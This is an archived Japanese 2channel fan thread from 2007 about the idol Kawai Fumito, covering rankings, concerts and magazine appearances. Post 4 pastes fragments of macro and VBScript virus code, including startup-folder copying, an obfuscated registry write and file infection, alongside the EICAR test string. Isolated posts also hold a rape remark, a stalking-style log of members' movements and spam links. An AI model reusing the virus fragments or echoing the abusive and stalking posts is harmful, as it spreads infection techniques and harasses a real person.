2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【納豆絵文字】サトル16赤【100連発】

1 :ヽ(*^ш^*)ノ:2007/01/24(水) 17:26:12
前スレ 【ウザキャワ】(☆^ш^)ノドMふみみ15笑゛
http://tv9.2ch.net/test/read.cgi/jr2/1155742979/l50


2 :ユーは名無しネ:2007/01/24(水) 17:26:58

Big河合郁人
http://saki.2ch.net/jr/kako/964/964550166.html
big 河合郁人
http://saki.2ch.net/jr/kako/980/980948197.html
☆出っ歯でいいじゃん!ふみきゅん。☆
http://saki.2ch.net/jr/kako/990/990200575.html
☆出っ歯でいいらしいよ!ふみきゅん2☆
http://music.2ch.net/jr/kako/1000/10004/1000403534.html
★★辰巳くん大好きです(河合 郁人 5 )★★
http://music.2ch.net/jr/kako/1009/10093/1009303072.html
★調子にのって、ごめんなさい!涙☆河合郁人6★
http://music.2ch.net/jr/kako/1013/10131/1013195805.html
★調子に乗ったら骨折りました!恥☆河合郁人7★
http://tv.2ch.net/test/read.cgi/jr/1015859133/
★うっかりしてたらセンターが!汗☆河合郁人9★
http://tv2.2ch.net/test/read.cgi/jr/1033359865/
★祝!高校生のふみきゅんです!照☆河合郁人10★
http://tv2.2ch.net/test/read.cgi/jr/1046354603/
★★ニキビは青春のシンボル!○☆河合郁人11★★
http://tv2.2ch.net/test/read.cgi/jr/1052652011/
★スーパーアイドル目指してます!☆河合郁人12★
http://music4.2ch.net/test/read.cgi/jr/1069855876/
(☆^ш^)ノ<気分はふみみです!13
http://tv7.2ch.net/test/read.cgi/jr/1094011677/
【超河合ゐ】(☆^ш^)フミキュンでちゅよ‐14バランス‐
http://tv7.2ch.net/test/read.cgi/jr/1115566422 

3 :ユーは名無しネ:2007/01/24(水) 17:46:27
スレ立て乙!

4 :ユーは名無しネ:2007/01/24(水) 19:19:20
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


5 :ユーは名無しネ:2007/01/24(水) 21:16:56
>1

サトルワロス(w

6 :ユーは名無しネ:2007/01/24(水) 21:32:39
さとるううううお前こんな所にいいい

7 :ユーは名無しネ:2007/01/25(木) 07:01:55
h

8 :ユーは名無しネ:2007/01/25(木) 21:10:19
スケベのランキング
読者投票もズニア投票もランクインしててワロス

9 :ユーは名無しネ:2007/01/25(木) 22:35:38
しかもズニア内の方がランク高いあたり実証性があるw
どうしてなんだろう肌蹴すぎだから?


10 :ユーは名無しネ:2007/01/26(金) 02:48:27
ふみみ曰く「中二レベルの下ネタ」をズニア内でよく披露してるんじゃないか?

11 :ユーは名無しネ:2007/01/26(金) 17:59:16
ふみみの時代はくるよ

12 :ユーは名無しネ:2007/01/26(金) 19:03:07
もうすぐふみみの時代がくるwktk

13 :ユーは名無しネ:2007/01/26(金) 20:08:47
普通のランキンよりズニアが選ぶ恋人ランキンのほうが
写りスチだ(*´∀`)禿カコヨス(w

14 :ユーは名無しネ:2007/01/26(金) 20:40:36
いつでもカコヨス
ふみみの時代は来るよw

15 :ユーは名無しネ:2007/01/26(金) 21:17:24
俺の(☆^ш‘)ノ時代☆

16 :ユーは名無しネ:2007/01/26(金) 22:38:31
前スレにもあったが他のランキングもふみみが誰に投票したのか気になる
恋人にしたいはチビからの人気が高いんだな

17 :ユーは名無しネ:2007/01/27(土) 00:20:46
どうして力持ちそうとかに入ってるんだろ
あの細い腕で力持ちに見えるのかよ

18 :ユーは名無しネ:2007/01/27(土) 00:25:16
自分も疑問だった
普通に見てケンカ弱いとかに入ってるかなと思ってたら逆でビックリ

19 :ユーは名無しネ:2007/01/27(土) 13:17:27


20 :ユーは名無しネ:2007/01/27(土) 19:19:53
>9
ヒント:足の父さんゑダギャ、海老氏蝉様とつるんんでるから


ゐは蝉軍団ジャン
あんだけ女繋がりの軍団といつも一緒だと恐いものなしだよ

21 :ユーは名無しネ:2007/01/27(土) 20:35:16
ケンカ強そうとか短気そうとか
そういうイメージ持たれてるんだなふみみ

22 :ユーは名無しネ:2007/01/28(日) 00:38:21
>21個人的にふみみは優しくて気の長そうなイメージだったんだが…ちょっと意外

23 :ユーは名無しネ:2007/01/28(日) 01:03:50
うん意外 ていうか多分短気じゃないよね
どこをみてみんな投票したんだろうw

24 :ユーは名無しネ:2007/01/28(日) 11:36:28
>15
テラキャワ
それふみみのAAにしたい(w

25 :ユーは名無しネ:2007/01/29(月) 15:44:21
河合

26 :ユーは名無しネ:2007/01/29(月) 16:58:14
郁人★

27 :ユーは名無しネ:2007/01/29(月) 19:54:39
(☆^ш‘)ノ

28 :ユーは名無しネ:2007/01/29(月) 21:58:58
ふみみキャワ
今週の小蔵早くみたいよ

29 :ユーは名無しネ:2007/01/29(月) 22:56:08
土曜が連載更新で日曜が小蔵かーwktk

30 :ユーは名無しネ:2007/01/29(月) 23:00:03
ふみみの連載今度は何書くんだろ楽しみ☆

31 :ユーは名無しネ:2007/01/30(火) 12:15:10
連載写真アップキボン(w

32 :ユーは名無しネ:2007/01/30(火) 20:56:01
きっとまたゑが出てくるんジャマイカ?

33 :ユーは名無しネ:2007/01/30(火) 21:11:02
ゑでも父さんでも何でも来い!

34 :ユーは名無しネ:2007/01/30(火) 21:24:08
ふみみはゑのことあんなに書いてたのに
ゑは全くふみみに触れてなくてカワイソス(w

35 :ユーは名無しネ:2007/01/30(火) 21:38:01
それがふみみクオリティ

36 :ユーは名無しネ:2007/01/30(火) 21:39:30
ドMのふみみ事だから喜んでるよ

37 :ユーは名無しネ:2007/01/31(水) 01:21:22
ドMなふみみとドSなゑだからピッタリなんだな(w

38 :ユーは名無しネ:2007/01/31(水) 01:39:44
>37
ふみみと蝉様もそれだよな(w

39 :ユーは名無しネ:2007/01/31(水) 15:43:03
テレガイ映りこんでるね(*´∀`)

40 :ユーは名無しネ:2007/01/31(水) 20:50:34
たは

41 :ユーは名無しネ:2007/02/01(木) 03:00:40
>39
見てきたノシ
カコヨス(*´∀`)

42 :ユーは名無しネ:2007/02/02(金) 15:20:12
書き込み少ない・・・
なにかふみみ情報キボン

43 :ユーは名無しネ:2007/02/02(金) 19:22:33
情報でもなんでもないけど今日過ぎたら3ノツ更新されるね
あと今週の小蔵もふみみ祭らしいしハイビ録画モノですね

44 :ユーは名無しネ:2007/02/02(金) 20:43:16
滝翼のダメ、いつ発売?
あれでれば海老氏バックにつきそうだから露出増えるかも


45 :ユーは名無しネ:2007/02/02(金) 21:32:57
とりあえずsageようよ

大人の事情でダメは発売が遅れているらしい

46 :ユーは名無しネ:2007/02/02(金) 23:12:53
石鹸もだが大人の事情ブームだな

47 :ユーは名無しネ:2007/02/02(金) 23:51:25
次の少蔵はスターシーカーあるしミラクル大作戦あるしP曲あるしwktk

48 :ユーは名無しネ:2007/02/03(土) 12:10:31
カラオケ行ったら曲入れてない時に流れる新曲リストにダメ入ってたぞ
2月中に入るみたいだ

49 :ユーは名無しネ:2007/02/03(土) 13:53:01
先月長めだったから1ページだとなんかサミシス

50 :ユーは名無しネ:2007/02/03(土) 16:10:01
海老氏の少蔵レポも、うpされてたね

51 :ユーは名無しネ:2007/02/03(土) 17:44:38
>49
禿同
あんま書く内容がなかったのかもしれんが
なんか物足りないよな

52 :ユーは名無しネ:2007/02/03(土) 19:35:43
不覚にもフミキュンのポエムに胸を打たれてしまった

53 :ユーは名無しネ:2007/02/03(土) 20:40:33
>52
自分も胸打たれたよw

さっき違う板で海老氏にダギャが加入するってふみみが滝つ魂で紹介したって書き込み見たんだが…本当か脳orz

誰か詳細知ってる?

54 :ユーは名無しネ:2007/02/03(土) 20:53:28
短いのは前野が長かった分たしかに寂しい気もした
デブ組とちがって月に一回しか更新できないんだからもっといっぱい語ってほしいな

55 :ユーは名無しネ:2007/02/03(土) 22:08:56
川*ΦeΦ)|千チャソのバックしてくれてdギャー

56 :ユーは名無しネ:2007/02/03(土) 22:28:07
ふみとレイプしたい

57 :ユーは名無しネ:2007/02/03(土) 22:45:35
>53
ウソだと言ってクレ

58 :ユーは名無しネ:2007/02/03(土) 22:50:01
>57
滝つがダギャに他の足はどうしたの?って振ったのを
ダギャが困って宝ふみみが海老氏見習いって言ったらしいよ
冗談でフォローしただけだろ

59 :ユーは名無しネ:2007/02/04(日) 02:37:53
今日参戦したけどそんなこと言ってたか…?
でも海老氏とダギャは別に紹介されてたよ

60 :ユーは名無しネ:2007/02/04(日) 05:27:23
自分も今日参戦したがそんなことは1回も言ってなかったぞ
むしろ滝つとダギャの絡みは全然なかった
バックも海老とダギャ+3人で別れていて海老とダギャの5人で踊ったのなんて1曲だけ
だから安心していい

61 :ユーは名無しネ:2007/02/04(日) 06:20:06
>60
d葡萄缶の組み合わせがあったから
変に鬱ってたが安心した
自分は岩手牛タンから参戦なので来週レポるねノシ

62 :ユーは名無しネ:2007/02/04(日) 11:02:13
>59-60
d
ヨカタ安心した
よかったらふみみレポおながいしますノシ

63 :ユーは名無しネ:2007/02/04(日) 14:48:06
>60d!!
ちょっとした噂に流されて適当な事書いてスマソ…
安心したよ

64 :ユーは名無しネ:2007/02/04(日) 15:17:19
小蔵wktk

65 :ユーは名無しネ:2007/02/04(日) 19:23:12
ふみみモエス!!!!!

66 :ユーは名無しネ:2007/02/04(日) 20:31:36
他担だがゐもスチなので滝の無茶振り歪の生歌物真似見れてヨカタ!
会場かなり盛り上がったよ(w

67 :ユーは名無しネ:2007/02/04(日) 20:42:44
ふみみ滝つ紺で歪物真似やったのか?

68 :ユーは名無しネ:2007/02/04(日) 20:52:09
歌は似るかなーと言いながら普通に歌い踊る姿は立派ですた(w

69 :ユーは名無しネ:2007/02/04(日) 20:54:36
モノマネ100連発!と新聞ラテ欄に載ったのが嬉しかったらしいな
それを切り取って持っているとかふみみキャワ(w

70 :ユーは名無しネ:2007/02/04(日) 20:55:54
ふみみ小蔵もキャワだったよ

71 :ユーは名無しネ:2007/02/04(日) 21:28:34
小蔵ふみみダンス上手すぎ

72 :ユーは名無しネ:2007/02/04(日) 21:31:56
松潤のWISHをアカペラ振り付きでやってくれたよ
海老の曲のときもふみみから始まるし
MC中もずっとマイク持って喋っててかなりウマーだったよ

73 :ユーは名無しネ:2007/02/04(日) 22:19:40
やっぱりふみみの時代は来るね

74 :ユーは名無しネ:2007/02/05(月) 00:17:50
少蔵誰がロンダートのお手本をやるかと言う話の時に
ふみみの手が蝉様の手にからまって二人が笑ってたところ
キャワだしホッコリ(*´∀`)

75 :ユーは名無しネ:2007/02/05(月) 12:12:06
ふみみの時代クルー(・∀・)

76 :ユーは名無しネ:2007/02/05(月) 12:49:22
きたらいいが…
どうしたら海老氏露出増えるか…


77 :ユーは名無しネ:2007/02/05(月) 18:15:59
着ボのリピがとまらない

78 :ユーは名無しネ:2007/02/05(月) 19:12:31
リピ止まらね−
しかし会いたいよのとこ片言なアジア系みたいでワロス

79 :ユーは名無しネ:2007/02/05(月) 20:37:59
ちょっと日本語下手くそなふみみキャワ(゚∀゚)w

80 :ユーは名無しネ:2007/02/05(月) 21:15:08
ボイス禿モエス(w

81 :ユーは名無しネ:2007/02/05(月) 21:51:38
あの台詞言って演技してるふみみがミタス(*´∀`)

82 :ユーは名無しネ:2007/02/06(火) 23:25:35
ふみみ今彼女いるの?

83 :ユーは名無しネ:2007/02/06(火) 23:51:37
ヴァカ

84 :ユーは名無しネ:2007/02/07(水) 00:55:57
ふみみ着ボ禿モエス
ふみみキャワキャワ

85 :ユーは名無しネ:2007/02/07(水) 02:37:07
いつものウザボイスもいいが
今回のはモエスすぎる(*´Д`)

86 :ユーは名無しネ:2007/02/07(水) 09:11:57
ユーチューブみたいに動画も投稿できる掲示板で芸能人の秘蔵映像発見!!
↓ ↓みんなのお宝映像も投稿できるよ
http://www.debutroad.com/xp/
 ジャニネタ掲示板!!の掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=4
 スマスマ板の掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=5
 V6専用掲示板の掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=15
 NewS専用BBSの掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=19
 KAT-TUN掲示板の掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=16
 関ジャニ専用掲示板の掲示板 ↓↓
http://www.geinoukainouwasa.com/xp/modules/tinynono2191/index.php?id=18
結構面白かったんで皆さんもどうぞ。


87 :ユーは名無しネ:2007/02/07(水) 19:41:35
片目誌巻頭クロストークでふみみの話題出ててワロス(w

88 :ユーは名無しネ:2007/02/07(水) 20:26:44
2月号の?
ど、どんな話題でしたか?

89 :ユーは名無しネ:2007/02/07(水) 22:32:51
ズニアが表紙だとふみみもいつか…
とオモテしまうorz

90 :ユーは名無しネ:2007/02/07(水) 23:14:11
まず見開き2Pでその次ピンナ最後に表紙て感じジャマイカ
自分は表紙より見開き2Pさらに個人1Pがいいな

91 :ユーは名無しネ:2007/02/08(木) 00:52:55
全部!w

92 :ユーは名無しネ:2007/02/08(木) 12:38:29
個人1Pなんて見たら目知る確実だよ

93 :ユーは名無しネ:2007/02/08(木) 18:44:13
自分はふみみが個人1P出しちゃったら買い占める勢いだな(゚∀゚)

94 :ユーは名無しネ:2007/02/08(木) 23:16:12
>92姐さんは
×目知る
〇目汁
だよな?(w

今月の☆誌のデブアンケもふみみで出したし
自分はいつもピンナキボンと葉書に書いてるのにorz

95 :ユーは名無しネ:2007/02/08(木) 23:21:12
海老氏で表紙出来る日が来るといいよな

96 :ユーは名無しネ:2007/02/08(木) 23:55:57
片目誌のシールはカクイイよ
海老氏4人で良かったと思った瞬間

97 :ユーは名無しネ:2007/02/09(金) 00:46:18
>96
禿同
見開きすぐの目につく位置だったし

98 :ユーは名無しネ:2007/02/09(金) 01:32:12
ふみみ担姐さんはふみみと一緒でユニ愛強いね(*´∀`)

99 :ユーは名無しネ:2007/02/09(金) 08:05:32
海老氏ダイスチだよー

100 :ユーは名無しネ:2007/02/09(金) 10:39:43
(☆^ш^)ノ<100☆

101 :ユーは名無しネ:2007/02/09(金) 11:56:35
ふみみオメ!
自分も海老氏好き

102 :ユーは名無しネ:2007/02/09(金) 12:09:52
(☆^ш^)ノ<海老氏大好き☆

103 :ユーは名無しネ:2007/02/09(金) 17:44:30
ここは穏やかでいいよな
これからもふみみと海老溺愛で応援していこう(゚∀゚)

104 :ユーは名無しネ:2007/02/09(金) 23:55:08
ココは基本穏やかだが団結力が去年からスゴス(w
居心地良くて禿スチだ(*´∀`)

105 :ユーは名無しネ:2007/02/10(土) 22:38:55
滝つ紺レポおながいします

106 :すずめ:2007/02/11(日) 04:42:58
出っ歯W

107 :ユーは名無しネ:2007/02/11(日) 16:02:19
Wishテラ楽しみだ(w

108 :ユーは名無しネ:2007/02/11(日) 18:02:03
>107
自分も禿楽しみだ


滝つ紺で凸がいなかった分ふみみが手紙読む役やったそうで
凸担は可愛そうだが北の国参戦の自分はうらやましかったり…

109 :ユーは名無しネ:2007/02/11(日) 19:16:26
WISHバロス(w
凸と禿楽しそうだったな(w

110 :ユーは名無しネ:2007/02/11(日) 19:50:37
ヒラメの顔を覗きこむふみみ萌えwww

111 :ユーは名無しネ:2007/02/11(日) 19:55:19
ふみみの時代がくるよ

112 :ユーは名無しネ:2007/02/11(日) 20:02:18
ふみみの時代は来るよ

113 :ユーは名無しネ:2007/02/11(日) 20:02:26
アニバのふみみが不覚にもカッコイイと思ってしまったおorz

114 :ユーは名無しネ:2007/02/11(日) 20:53:41
>108
手紙は魚介初日だけでは?岩手も牛舌もふみみは読んでナス
今日の狂虹の曲紹介でメチャブリをされてふみみウマーだった
1部はwishアカペラ2部は滝のカミラタマラの後新作って振られ
つのダンスの振りマネをやってた結局歪で曲紹介したからモノマネウマーだった

115 :ユーは名無しネ:2007/02/11(日) 21:03:58
>114
そうだったのか
でもふみみウマーで良かったね(・∀・)
これからだんだんいじられていくのかな

116 :ユーは名無しネ:2007/02/11(日) 21:04:17
ふみみ人気だなw嬉しい

117 :ユーは名無しネ:2007/02/11(日) 21:31:59
wishのラストでキャメイに突っ込んでるふみみキャワ

118 :ユーは名無しネ:2007/02/12(月) 02:28:02
ふみみのモノマネネタ滝つ紺スレとか歪スレでも話題になってる
モノマネキャラでデブ組担姐さんにもふみみのこと知ってもらえたらイイな(・∀・)

119 :ユーは名無しネ:2007/02/12(月) 12:00:42
昨日の少蔵ゐや海老氏的にあまりツボはなかったけど
ゑや父さんとじゃれてるゐが可愛かった

120 :ユーは名無しネ:2007/02/12(月) 13:16:06
ゑになりたかった(w

121 :ユーは名無しネ:2007/02/12(月) 13:37:45
@@

122 :ユーは名無しネ:2007/02/12(月) 23:11:26
牛舌ふみみうちわイパーイ見たよ

123 :ユーは名無しネ:2007/02/13(火) 03:40:42
ふみみ少年でも内輪安定して多いよな
ふみみの時代クルーノシノシノシ

124 :ユーは名無しネ:2007/02/13(火) 20:14:54
俺の(☆^ш^)ノ時代☆

125 :ユーは名無しネ:2007/02/13(火) 20:59:13
ゑ様の3ノツに名前出ててなんかウレシス
あの4人お決まりなんだな

126 :ユーは名無しネ:2007/02/13(火) 20:59:53
( ̄д ̄) エーと


いいにくいことなんですがゐはズニアやめますよ春で

127 :ユーは名無しネ:2007/02/13(火) 21:12:05
久しぶりに少蔵にハガキでもだそうかな

128 :ユーは名無しネ:2007/02/14(水) 02:44:20
>127
出すならまた一斉投函(w

129 :ユーは名無しネ:2007/02/14(水) 05:03:07
オマイらこれ読んでみろよ↓
http://nospace.cside9.com/mid-br/top.htm

130 :ユーは名無しネ:2007/02/14(水) 17:18:12
最近少蔵でふみみ妙に活躍してるから
リク葉書少しは意味あったのかな(w
これで個人Pやってくれたら最高なのに

131 :ユーは名無しネ:2007/02/14(水) 21:24:01
ふみみ裸少出るんだな(w
大魔神とロケしてたみたいだからテラ楽しみ

132 :ユーは名無しネ:2007/02/14(水) 22:16:18
>128
出すならモノマネキボン系?

133 :ユーは名無しネ:2007/02/14(水) 22:44:34
>131
情報トンです!そういうの全然気づかないから嬉しい
チェックしなきゃ

134 :一生デブ出来ないゐ死ねし:2007/02/14(水) 23:57:48
2*:*? 千賀、スタジオ
   飛び出してくる
   キチガイ行動
   タク止める
   河合・五関と乗車

2*:*0 残りメンバー一斉出
  戸塚・真田相合い傘

2*:*1 戸塚・岩本
    乗車

2*:*2 下車

2*:*0 戸塚
    乗車


135 :ユーは名無しネ:2007/02/15(木) 00:01:56
ハガキ、一斉投稿じゃなくてもいい気もする
逆に一斉だとヲタががんばって計画したのかって感じだし
余裕のある人が頻繁に送っていければ「最近なんとなくハガキ多いから・・・」

ってなると思うのは甘いか

136 :ユーは名無しネ:2007/02/15(木) 00:55:32
一週間とか期間決めてその間に出すのはどう?
自分はモノマネもっと見たいよ

137 :ユーは名無しネ:2007/02/15(木) 01:13:13
自分もモノマネもっと見たい
個人Pは今までのメンツからして押されてるヤシしかやらせてもらえなそうだよなorz
でもその辺一通りやったからふみみにも回ってくるといいな

138 :ユーは名無しネ:2007/02/15(木) 05:40:52
自分はモノマネよりは歌が聴きたいなあ
モノマネ好きだけど
ふみみ=ものまねになるのも嫌だし

139 : ◆0ndla8Sle2 :2007/02/15(木) 10:04:09
葉書出しても蛇兄のお気に入りじゃないから無駄ですよ

140 :ユーは名無しネ:2007/02/16(金) 23:42:28
タモステ出てたな(w

141 :ユーは名無しネ:2007/02/17(土) 00:36:55
髪型カコヨス

142 :ユーは名無しネ:2007/02/17(土) 10:39:46
ふみみかなり映ってたな

143 :ユーは名無しネ:2007/02/17(土) 11:15:46
さすがふみみ
写りこみのテンサーイ


144 :ユーは名無しネ:2007/02/17(土) 12:02:31
あらちのバックで踊ってほしかった(w

145 :ユーは名無しネ:2007/02/17(土) 12:22:23
400:ユーは名無しネ :2007/02/16(金) 22:49:46 [sage] >398
歪だかが(傘だたか脳)
「フリがモノマネなんですよ」
的な事言った時は焦った(w
「思い出ずっとずっと〜で僕がゐくんのモノマネするんです」
的なのを期待してしまた自分

他スレだがワロタので
ここのフリ「ふみきゅん☆トースト」な動きだよな(w

146 :ユーは名無しネ:2007/02/17(土) 13:50:12
>145
吹いた(w
言われてみると確かにそのフリ似てる

147 :ユーは名無しネ:2007/02/17(土) 21:50:11
ユニスレでも出てたが、今日の2部ふみみの物まねステージだった
金様のwish、日記でwish、升などやってた
膝ガタガタと言いながらやるふみみスゴス
1部は髪型普通だったが、2部は前髪上げててかなりかっこよかった
携帯からで改行おかしかったらスマソ

148 :ユーは名無しネ:2007/02/17(土) 23:20:07
自分まだ参戦してないんだが
ふみみはいつも何のときに物真似披露してるんだ?

149 :ユーは名無しネ:2007/02/17(土) 23:29:57
中盤のMC

150 :ユーは名無しネ:2007/02/17(土) 23:59:28
>147
d
物真似テラミタスwww
升の物真似は歌マネなのか?

151 :ユーは名無しネ:2007/02/18(日) 00:53:14
>150
ミソスープの「温めてくれた〜」の部分のみ
かなり短いがテラモエス
蝉様にちょっと前の部分歌ってもらってふみみがそこを物まねしてた

152 :ユーは名無しネ:2007/02/18(日) 08:17:29
>150
歌と手振りも真似してた
手を上下に大きく動かしてたら余りにもオーバーすぎたため滝に
(升を)馬鹿にしてるよねって突っ込まれてた
かなり時間とったんだがその中でちゃんと
これ自分の紺じゃないんでって遠慮してた
やりかけて滝つに、これ君の紺じゃないんで…と突っ込まれる場面も有り
物真似前に滝にこの与えられたチャンスを活かせ(w
と気合い入れてもらってた
・海老氏のリーダーは?という話題から滝に「老けちゃん」と呼ばれてることが判明
さらにその名前宛てにメールが送られてくることも

全体的にウマーで笑いもかなりとってた

153 :ユーは名無しネ:2007/02/18(日) 12:43:12
ゐきゃわああああ
トンです!

154 :ユーは名無しネ:2007/02/18(日) 14:23:33
>152
dd
ふみみウマ-杉だな(w
最後までモノマネコーナー続いてホスィ(w

155 :ユーは名無しネ:2007/02/18(日) 16:27:16
滝はホント面倒見いいな
全てのズニアに対してだけど
ふみみみたいなウザキャワも拒まずちゃんと相手してあげる
しかもその上自分の紺でもズニア立てるんだもんなーありがたや

156 :ユーは名無しネ:2007/02/18(日) 17:28:45
滝様様だよな頭があがら茄子
でも
ふみみもズニアの面倒とか結構良く見てるイメージあるなー
ふみみにかぎらず海老足(一部w)辺りがそういう役割まできちんと果たしててチビたちから慕われてる臭いがする

157 :ユーは名無しネ:2007/02/18(日) 18:17:39
海老氏はダンス上手いし職人肌だから
チビズの憧れの対象になりやすいのはわかるな
キャラがどうであろうと無条件で上手い人には憧れるもの

158 :ユーは名無しネ:2007/02/18(日) 21:05:21
芸能人の秘蔵映像キタ━━━━━━(゚∀゚)━━━━━━

http://tv9.2ch.net/test/read.cgi/actor/1170878857/54

159 :ユーは名無しネ:2007/02/18(日) 22:26:27
城の時波メッセで滝のストーカー宣言してたのってふみみだっけ?
携帯壊れてなくなってしまったモッタイナス

160 :ユーは名無しネ:2007/02/18(日) 23:39:19
>159
プラム

161 :ユーは名無しネ:2007/02/19(月) 12:05:59
>156
だからふみみズニアが選ぶ恋人にしたい1位だたんジャマイカ?
チビズに限らず後輩に慕われてるんでしょ

162 :ユーは名無しネ:2007/02/22(木) 20:11:50
今まで「ふみみ」ってウチワ持ったことある姐さんいる?
今度滝つ紺で持とうと思うんだがふみみ気付くかな?

163 :ユーは名無しネ:2007/02/22(木) 20:20:42
自分はサトル内輪スタンバってる

164 :ユーは名無しネ:2007/02/22(木) 21:04:00
46 名前:ユーは名無しネ[sage] 投稿日:2007/02/22(木) 18:59:37
ゐ担が発狂してるね
凸に嫉妬してもデブできないよ

47 名前:ユーは名無しネ[sage] 投稿日:2007/02/22(木) 19:00:27
あの出っ歯はひどいよね
凸みたいに欠点のない顔だったらよかったのにね

165 :ユーは名無しネ:2007/02/23(金) 00:12:13
ふみみは出っ歯でもテラカコヨスだから無問題

166 :ユーは名無しネ:2007/02/23(金) 19:18:40
むしろあの出っ歯が愛おしい

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)